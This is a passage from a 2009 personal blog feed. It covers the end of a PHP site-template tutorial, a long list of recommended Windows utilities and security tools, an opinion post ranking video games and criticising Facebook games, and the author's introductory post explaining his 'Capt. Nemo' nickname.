Artemis, and the template as well. Press Create, and voilà, we have our homepage. 
You may see that the heading, footer, and links are not changeable, because they’re not defined as “editable” in the template. However, the regions you chose to be editable are marked as such. Try writing some basic text in the sidebar and in the main content screen, and then save the file as index.php.</p> <p>Now open <a href="http://127.0.0.1/artemis/">http://127.0.0.1/artemis/</a> on your computer, and be greeted with your newest creation. It is still, as of now, a static site, with links that don’t work and no dynamism, but we will make it better in the next part.</p> <p>If you had trouble following this tutorial anywhere, feel free to post comments, or tweet me @captn3m0. I will be happy to reply. Further, if you feel that you missed something, here is my work for you to compare with:</p> <p>//#todo add link to zip file here</p> Nautilus : Behind The Curtains 2009-12-04T00:00:00+00:00 https://captnemo.in/blog/2009/12/04/nautilus-behind-the-curtains <p>Almost everyone looks at my laptop’s screen, and asks me “is that Windows 7?” and I reply to each of them with the same answer: “No”. I have not yet moved to 7, because of various reasons, which I am not going to explain over here, but let’s just say that I’m still clinging to dear old Vista. I don’t really have much of a trouble with Vista as many people have said. I work blazingly fast with Vista, which is what it is all about. As an operating system, it is expected to help me get my job done, not do everything by itself. And this is where my software listing comes into view. Since everyone has those “how the heck did you do that?” moments when they look at me doing stuff, I decided to publish a listing of some of my favourite applications that I use so that I may redirect you to a safe spot where you may choose things as you like. This listing may not suit your way of working, however you might find a gem or two along the way. This is not a listing of all the software that I use. 
Rather just a collection of cool tools that I think every Windows user must be using. If you think you’ve found that killer-app for doing things, do let me know in the comments. I’ll be listening.</p> <ul> <li><a title="Dell Dock" href="http://www.delldock.com"><img class="thumbnail" style="display:inline;border-width:0;margin:0 0 0 15px;" src="http://captn3m0.files.wordpress.com/2009/12/delldock.jpg" border="0" alt="" width="640" height="143" align="right" /></a><strong>Dell Dock :</strong> I just love this tool and its ability to divide the applications that I use into categories. It doesn’t take much of a screen estate, and takes me wherever I ask it to. With the ability to assign custom icons, and add separators/categories etc, it is more than an average dock, it’s my favourite dock. On the downside, this is only for Dell Computers, and comes preinstalled. However you can download it from <a title="DellDock.com" href="http://www.delldock.com" target="_blank">here</a> if you didn’t get it with your Dell system. Non-Dell users may be interested in RK Launcher, a freeware dock that simulates Mac Dashboard, and does a pretty good job. There was another version of Dell Dock (2.x), which has yet to be released on the website but was available to Dell Studio buyers, with new and better icons. Drop a comment if you need it.</li> <li> <p><strong>Windows Sidebar :</strong> Another tool I find myself using frequently is the Windows Sidebar, with 3-4 gadgets that are absolutely essential to me, such as the NowPlaying, MultiMeter, and the Top Processes gadget. A key shortcut to remember here is Win+Space which pops up my sidebar. Gadgets are a quick way to organize yourself, and keep a check on other things, like your schedule (Date Time), Twitter (Twadged), quick launching apps, direct search among other things. Most users underestimate their usage and restrict themselves to the Clock and Slideshow gadget. 
Go ahead and search for them, see if you can find a gadget that matches what you’d like.</p> </li> <li><a href="http://captn3m0.files.wordpress.com/2009/12/taskbar.jpg"><img class="thumbnail" style="display:inline;margin-left:0;margin-right:0;border-width:0;" title="My Taskbar" src="http://captn3m0.files.wordpress.com/2009/12/taskbar_thumb.jpg" border="0" alt="My Taskbar" width="480" height="77" align="right" /></a><strong>Quick Launch :</strong> Not many would regard this as a tool, however this gives one a productivity boost. Try putting your favourite tools in the Quick Launch, and see if that helps you a bit, between searching for that app in Start Menu, or clicking it right where it’s clickable. Also try increasing the size of the Quick Launch, by unlocking the taskbar, right click -&gt; View -&gt; Large Icons. That really looks cool!</li> <li><a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Internet Download Manager"><strong>Internet Download Manager</strong></a> : My personal favourite download manager. Others that you may be interested in are : Orbit, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=DownThemAll">DownThemAll</a>! (a Firefox extension). Helps me keep a track on what I’m downloading right now, and speed benefits are downright clear. I also like its feature to capture downloads from any application, so I don’t have to wait for those updates taking forever to download. It downloads using batch files and schedulers, and even turns off your computer when it’s done.</li> <li><a href="http://www.voidtools.com/" target="_blank"><strong>Everything</strong></a> : I should have put this above all in the list. This is such a good tool, I cannot overestimate its importance. What it basically does is searches “Everything”. The tool does not index file contents/properties, and only maintains an index of file names. As such it is blazingly fast, and searches all my applications/music/files damn quick. 
With an efficient shortcut (such as Win+S), you’re on your way to becoming a Windows power user. On the downside, once you start using this real frequently, you tend to get a little disorganized putting stuff everywhere, knowing you will find it with Everything. Here’s a link to the <a href="http://www.voidtools.com">website</a>. (MUST USE)</li> <li><strong>Browsers :</strong> In browsers, I currently use a combination of <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Google Chrome">Google Chrome</a>/<a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Firefox">Firefox</a> as my primary browser, updated to the latest dev build, and last stable beta respectively. Both of these are great, and I prefer Firefox with its huge base of extensions available. And if someone is out there using IE still, please switch immediately. Firefox is such a great way to browse with, and Chrome such an ease on the eyes. It’s hard for me to pick between the two, I’d rather wait and watch over the next year, where each one stands. Safari and Opera come a distant second for me with Safari being the better one.</li> <li> <p><strong>File Tools :</strong> I use <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=7-zip">7-zip</a> for compression purposes, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=CCleaner">CCleaner</a> to rid my computer of junk, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Defraggler">Defraggler</a> to defragment my hard disk, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Recuva">Recuva</a> from the same company to restore those accidentally deleted files. Another tool I would mention here is “<a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=GoodSync">GoodSync</a>” which I use to sync my USB drive and my Documents. I also use it to organize my Start Menu, using a Dock folder in my Desktop, which I sync to the Start Menu. 
<a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Dropbox">Dropbox</a> is the best tool I use for my syncing purposes, between different computers. It offers 2 GB for starters, and all the sync is on the fly, meaning you just copy things to your Dropbox folder, which is automatically synced to all of your computers. It is also a great way to sync your projects with different people.</p> </li> <li> <p><strong>Multimedia :</strong> I prefer Windows Media Player 11 for audio, and <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=VLC">VLC</a> for video viewing. With my NowPlaying gadget, and GTalk in sync with WMP, it’s easy to change tracks, and let others know what you’re listening to. I also use Zune occasionally when I’m in the mood of a pure music experience. Pictures are pretty easy to manage with Windows built in Photo Gallery, or its live version. Also check out Picasa, Google’s free photo management tool.</p> </li> <li> <p><strong>Office Tools :</strong> I am currently using a Technical Preview Beta of <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Office 2010">Office 2010</a>, for documents, presentations. <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Notepad++">Notepad++</a> for text and code editing, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Foxit PDF Reader">Foxit PDF Reader</a> for ebooks, and reading stuff, which is way faster, and smaller than that bloated Adobe Acrobat Reader. I use <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Windows Live Writer,">Windows Live Writer</a>, which offers a lot of plugins to edit posts, including this one. Offline Gmail and Google Docs capability is way cooler than you think. 
Do try it out.</p> </li> <li> <p><strong><a href="http://captn3m0.files.wordpress.com/2009/12/mse.jpg"><img class="thumbnail" style="display:inline;border-width:0;margin:0 0 0 20px;" title="mse" src="http://captn3m0.files.wordpress.com/2009/12/mse_thumb.jpg" border="0" alt="mse" width="306" height="168" align="right" /></a> Anti Virus :</strong> This is one of the areas where I am consulted the most. Which antivirus to use? Well I would recommend you <a href="http://www.google.com/search?btnI=I'm Feeling Lucky&amp;q=Kaspersky">Kaspersky</a> if you’re ready to shell out some money with a little slowing down to your system or use “<a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Microsoft Security Essentials">Microsoft Security Essentials</a>” which I currently use. It is quick, doesn’t hog down my system, stops real time protection when I want it to, excludes some of my dangerous folders from being scanned and nuked, updates itself, detects almost any virus I dare to throw at it, and looks neat. On the downside, however, it is just minimal, with no support for hosts file scanning, white listing, firewall, cookie management, user control, among other “high level stuff” that other anti viruses offer. But I like it, have been consistently using it for the last 3 months, and am pretty sure I’m virus free. It does have a catch : you must own a valid, genuine copy of Windows to use the tool.</p> </li> <li> <p><strong>Security Tools :</strong> Security Tools includes those nifty small programs that help me keep my computer safe, and sound. This listing comprises tools I would suggest to the average user, I personally use a combination of more than the following tools:</p> <ul> <li> <p><a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=AMPAWSmasherX">AMPAWSmasherX</a> : Stops viruses from using your pen drive as a medium, by blocking that autorun.inf file. 
You might not find the tool easily available for download, but if you do, it’s a pretty good one.</p> </li> <li> <p><a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=SpyBot Search &amp; Destroy">SpyBot Search &amp; Destroy</a> : This is a one stop protection for all malware. Keep the definitions updated, however, and you will find that infections are pretty easy to deal with.</p> </li> <li> <p><a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=HiJack This">HiJack This</a> : Must use every 2 weeks or so. Shows you anything that has been changed from normal settings on your computer, and allows you to change it to default. Use carefully, as it may cause instability on your system later on, as it is quite a powerful tool, and if you don’t know what to do, generate your report, and post it online in one of the help forums.</p> </li> <li> <p><a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=WinPatrol"><img class="thumbnail" style="display:inline;margin-left:0;margin-right:0;border-width:0;" title="winpatrol" src="http://captn3m0.files.wordpress.com/2009/12/winpatrol.jpg" border="0" alt="winpatrol" width="377" height="168" align="right" /> WinPatrol</a> : This is also a must-use program for securing your computer against anything “unwanted” which may include viruses, malware, additional crapware, fake windows services, hidden files, and the like. This is basically a watchdog (Scotty), which keeps a watch on any new startup programs (my favorite), and file extension changes, and new services and the like. If Scotty detects an unwanted change in your system, it barks and reminds you of the change and asks you if you’d like to keep it. It also allows you to add/remove/delay your startup programs list, and is my favourite program of the lot.</p> </li> </ul> </li> <li> <p><strong>Other Tools :</strong> I would just like to recommend some more everyday helpful tools to you, in no particular order. 
Try them out, you might like them or not, but they are definitely worth checking out : <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=TeraCopy">TeraCopy</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=AveThumbnail Resizer">AveThumbnail Resizer</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=TuneUpUtilities">TuneUpUtilities</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=VistaGlazz">VistaGlazz</a> (must use for including transparency in the title bar), <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=appwiz.cpl">appwiz.cpl</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=WinBubbles">WinBubbles</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Privoxy">Privoxy</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=TaskBar Shuffle">TaskBar Shuffle</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=Paint.NET">Paint.NET</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=DupFiles">DupFiles</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=WinDirStat">WinDirStat</a>, <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=OverDisk">OverDisk</a> (both for checking disk usage), <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=PMenu">PMenu</a> (especially if you use portable programs on your USB drive, or for assigning Win+ hotkeys to programs, like I use Win+P=paint, N=notepad), <a href="http://www.google.com/search?btnI=I'm Feeling Lucky&amp;q=Nero Free version">Nero Free version</a> among others (Refer below for a complete listing) <a href="http://captn3m0.files.wordpress.com/2009/12/pm.jpg"><img class="thumbnail" style="display:inline;margin-left:0;margin-right:0;border-width:0;" title="PowerMenu" src="http://captn3m0.files.wordpress.com/2009/12/pm_thumb.jpg" border="0" alt="PowerMenu" width="244" height="195" 
align="right" /></a></p> </li> <li><strong>Looks :</strong> Looks are a necessary part of making your computer shine out in the crowd. And I use the least required programs for that purpose. Using Tune Up’s styler to change my login Screen, and my personal wallpaper collection which I shuffle through using “Vortec Wallpaper changer”, a utility I built. Using Vista Glazz to patch my theme files to support 3rd party themes, I use themes downloaded from “deviantArt”. I also iconized my taskbar, for efficiently managing taskbar, and changed the quick launch icon size to large (looks cool). <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=QTTab Bar">QTTab Bar</a> is also a cool addition to Windows installing tabbed browsing in Windows Explorer. The current theme I use is “Cleaero”, and it gives me some cool transparency. I also use <a href="http://www.google.com/search?btnI=I’m Feeling Lucky&amp;q=PowerMenu">PowerMenu</a> (another must use) for adding transparency, or changing priority of any window. I love it when my Firefox window is transparent and I’m browsing while watching a video in the background. That is damn-right as cool as it gets without using Windows Blinds. And choosing the coolest gadgets can make all the difference, so see if you can find the right ones!</li> </ul> <h3 id="complete-listing-of-tools">Complete Listing of Tools</h3> <blockquote> <p>The above was just a partial listing of the programs that I use. I generated a file listing of all the software that I use, using four different methods. All of these are in text files, that you may use, with one exception. The easiest one is a tree map generated for my Dock Folder (list.dock). I generate a listing of all exe files inside my program files (which may not be complete since many like Chrome are installed in userdata folder). This one is renamed as list.exe.txt. Next I generate a listing of all installed programs using Hijack this!, called list.hijack. 
Another one was compiled using WinDirStat (list.windirstat). Using OverDisk I generated a virtual folder view of my Apps directory (this one’s huge at 2.x MB). Then I zipped them up and posted them here. Browse through them, you might find a lesser used unknown app here. Especially check out the “tiny” folder. It is literally legendary, with tons of stuff! And one more thing, use OverDisk to open the ovd file.</p> <p>Download Here – <a href="http://dl.dropbox.com/u/1766113/List.zip" target="_self">Listings</a></p> </blockquote> <p>This list was composed by Capt. Nemo as a recommendation for non-power users of Windows. You are free to check out any of the programs, most of them are freeware, if not open source, and do not pose a harm to your computer. However if anything happens to your computer by these tools I am NOT responsible for the usage of the tool. And I try to use open-source/freeware tools as far as possible. If you use a commercial tool, do remember to pay the author, and stand against piracy. Otherwise use “Free as in Beer” tools like me!</p> Games to play and not to play 2009-11-23T00:00:00+00:00 https://captnemo.in/blog/2009/11/23/gamers-saga-games-to-play-and-not-to-play <p>This article has been bubbling in my mind for quite some time, and I’ve decided to steam it off. There are games that you must play, like Mario or Contra. Then there are games that you play (Counter Strike, AoE). Some games you wish you could play (Assassin’s Creed, Far Cry). Games you should play (Braid, Minesweeper, Spore). And finally come the games you must NEVER play (Farmville, World Of Warcraft, Mafia Wars, School Of Magic and the like). Why this categorization? Because I recently decided to leave School Of Magic on Facebook after a week long affair where I reached lvl 15, and was about to get into “thick of things” as they say. Why? Because I realized that SOM is not a true game. A game is supposed to be entertaining, and indulgive. 
If it tells me to do something, I must do it because I take interest in it. Not to get ahead of my peers. I recently came across an <a href="http://www.smh.com.au/news/articles/ethical-dilemmas/2007/09/19/1189881577195.html">article</a> by <a href="http://en.wikipedia.org/wiki/Jonathan_Blow">Jonathan Blow</a>, my favourite game designer (Braid). He opened my mind to the fact that <strong>“A Game is a form of art”</strong>.</p> <p>You may not agree with this statement right now, but consider James Cameron’s Avatar, which looks so close to real, yet is live 3d. It does look kind of gamer-ish, doesn’t it? And we all agree that cinemas, and literature are a part of our culture, part of our art. But as movies get closer to games(Resident Evil, Prince Of Persia), the same is happening the other way around. Games are becoming a part of our art culture. Games like Bio-Shock, and Fear portray the doomed versions of our future. The designer behind these games did not just say, let’s make another FPS, where you kill everything that moves (that was Doom 1,2 by the way). They decided to create a realistic storyline, and a better game play. That is as innovative as it takes to get the feel of the game to the player. Let us now take up some of these categories I defined quickly.</p> <dl> <dt>Games You Must Play</dt> <dd>These are the kind of games, that each of us has played. They remind us of how we first stared at that green background trying to figure out the next play in Solitaire. Or the joy of ducking under the dragon and touching that axe in Mario. These games still remind us about the giant leap that the gaming industry has taken. For Dave, Wolf-3d, Roadrash, we have reached graphics quality that surpasses HD (Call Of Duty Modern Warfare 2)</dd> <dt>Games You Play</dt> <dd>Skip this if you aren’t a gamer. If you’re one, well you know the games I’m talking about. Nothing beats taking a frag with a deagle. Other than maybe shouting 14 before all those AoE games. 
It’s the thrill, and excitement, and your love of the game that keeps you glued to the seat. I won’t call these games entirely unethical, because the game play here is fair enough, and exciting. You know what you’re doing, and why. And it’s not just because of that score, or frag. It is also because of the satisfaction that you get after that frag.</dd> <dt>Games You Wish You Could Play</dt> <dd>Sometimes your graphics card isn’t all that powerful, or you just can’t find a torrent/download link for the game. Sometimes 10GB games do seem big. And sometimes, as in the case of FIESTA, the game hasn’t been launched for PC.</dd> <dt>Games You Should Play</dt> <dd>These are the games that really matter. That form the core of my “games are art” theory. Games like <a href="http://www.braid-game.com">Braid</a>, <a href="http://www.hemispheregames.com/osmos/">Osmos</a>, Minesweeper, Prince Of Persia (not all), Tomb Raider (again not all parts). These games take you into their own world, where you get to learn, listen, think, and observe. Where you play the game because it’s exciting, and fun, and you want to play it. Not because someone is offering you a “level up” if you click on a button.</dd> <dt>Games You Should Never Play</dt> <dd>If once is not enough, I repeat, <strong>Stay away from these games</strong>. Please, these hacked up versions of the same code, or sometimes game idea, do not deserve to be called games. Mafia Wars, Restaurant, Cafe Shop, and all of those mindless Facebook games come here. And so do World Of Warcraft, Travian, NFS Pro Street (that was just a bad game). These so-called-games <ol> <li>do nothing to entertain you</li> <li>offer you nothing but just-another-level-up</li> <li>never “teach” something (play Braid, you’ll understand what I mean)</li> <li>have nothing interesting</li> </ol> </dd> </dl> <p>Then what is the reason that they are so hyped, and most played MMORPGs? The reason is lack of better games. 
Lack of games that exist on facebook and is not-another-clone-of-mafia-wars. Lack of games that adhere to strict design ideas. Do not take me wrong. There are some serious game designers who are talented, but the truth is that they are forced to make what sells, and what sells is Mafia Wars. Unfortunately. And these people are forced to work for such games. Wasting their talent on such mindless games. And if all of this wasn’t enough read this quote by the CEO of Mafia Wars :</p> <blockquote> <p>I knew that i wanted to control my destiny, so I knew I needed revenues, right, fucking, now. Like I needed revenues now. So I funded the company myself but I did every horrible thing in the book to, just to get revenues right away. I mean we gave our users poker chips if they downloaded this zwinky toolbar which was like, I dont know, I downloaded it once and couldn’t get rid of it. <em>laughs</em> We did anything possible just to just get revenues so that we could grow and be a real business…So control your destiny. So that was a big lesson, controlling your business. So by the time we raised money we were profitable.</p> </blockquote> <p>Read the entire story on facebook gaming scams <a href="https://consumerist.com/2009/11/09/mafia-wars-ceo-brags-about-scamming-users-from-day-one/">here</a>. And if you’re with me, try picking up some better titles instead of playing these nonsense games on FB</p> Welcome Aboard The Nautilus 2009-11-19T00:00:00+00:00 https://captnemo.in/blog/2009/11/19/welcome <p>This is my first real post on my brand new blog at wordpress, and quite seriously, I’m thrilled to get a new start. I hope this project would flourish unlike many of the other things I took up (<a href="http://kasiasi.blogspot.com" target="_blank">Kasiasi</a>, <a href="http://www.papercut.co.nr" target="_blank">Papercut</a>,…). I have not yet completely given up on Papercut, and I really liked the Google Sites interface, but posting online, and editing it takes time. 
So this is my first attempt at publishing offline edited work, using Windows Live Writer. I’ll try to use other options as well, and let you know which I like best.</p> <p>Now for some blogging stuff. What’s happening aboard the Nautilus? What is the Nautilus, and who is Capt. Nemo? Let me answer these three questions in my introductory post first. It all began in Kota, when I was a JEE student vying to enter the holiest institutes of the country, the IIT. And what I was doing there was, well studying and playing Age Of Empires, with my two best friends, Sankalp (aka General Hendrix) and Shundi (aka DR. Lecter). And our trio was one of the most feared AoE clans in Kota. We were playing together in perfect team play, and knew every counter there was to know, and every fact in the guidebook.</p> <p>There was just a little flaw, I didn’t have a name. I used to play under various names, like Godfather, Eragon, and of course Harry Potter, but none of these stuck, and I was still nameless. I was like Maerad in The Gift, looking for her true name. That night I went sleepless, and searched my inner soul for my True name. Both of my teammates already had titles (one doctor, and other a general), so I decided I would get one as well. And after storming my brain for all the books I’ve read, and all those movies, I settled for <a href="http://en.wikipedia.org/wiki/Capt._Nemo" target="_blank">Capt. Nemo</a>. Where did I get the name from? It was from a book called “20,000 Leagues under the sea”, by the immortal master of Sci-Fi, Jules Verne. The character of Capt. Nemo was one of the most mysterious you could ever see. And one of the most brilliant. And I got it when I’d read it for the umpteenth time, Capt. Nemo wasn’t an enigma. Just because he didn’t fit into the definition of a hero doesn’t make him a villain. 
I could go on and on about the character, but that would take up space, which I’m determined to use to answer the other 2 questions.</p> <p>So what is the Nautilus? I call pretty much everything I own, the Nautilus. Why? Because that was Capt. Nemo’s masterpiece. His submarine, and the very first, at least on paper. And my room and my laptop are labelled as Nautilus. And this blog is the path that I follow “Aboard The Nautilus”. That brings me to the third question, what I’ve been doing lately?</p> <p>Lately I’ve been playing around with PHP a lot, and mind you it is really cool. I might post some of my experiences with PHP later on. And the reason I’ve been playing with PHP is because I’ve been working on my own website (it’s not exactly mine, it’s under Web Designing Section, IITR, but I’ve written 95% of its code). I’ll be launching soon, under a limited beta, so keep watching. I’ve also been working on the second issue of Criitique, an e-magazine for the youth. With kick-ass articles you are sure to like it. Do check it at <a href="http://www.criitique.com">www.criitique.com</a>. Playing Age Of Empires is now a daily affair for me, and I’ve been working my way up and down my timings. For those interested, my timings currently are “13,20,35 with 27,28-29 pop”. I’ve been tweeting a lot, and I still don’t know why the Twitter fad isn’t catching up in India. Twitter is fast, and easy, so why don’t people use it? Any ideas? Let me know.</p> <p>I’ve also got to study, with my end sems coming up, and this seems to be the time to do it. Got any more brainstorming ideas to work on? Wanna work with me? Join the fun Aboard The Nautilus.</p> <p>As an update, Windows Live Writer refused to connect to my blog and I finally used BlogDesk to publish my post. And I also tried Qumana, and wBlogger, and FYI, none of them work.</p>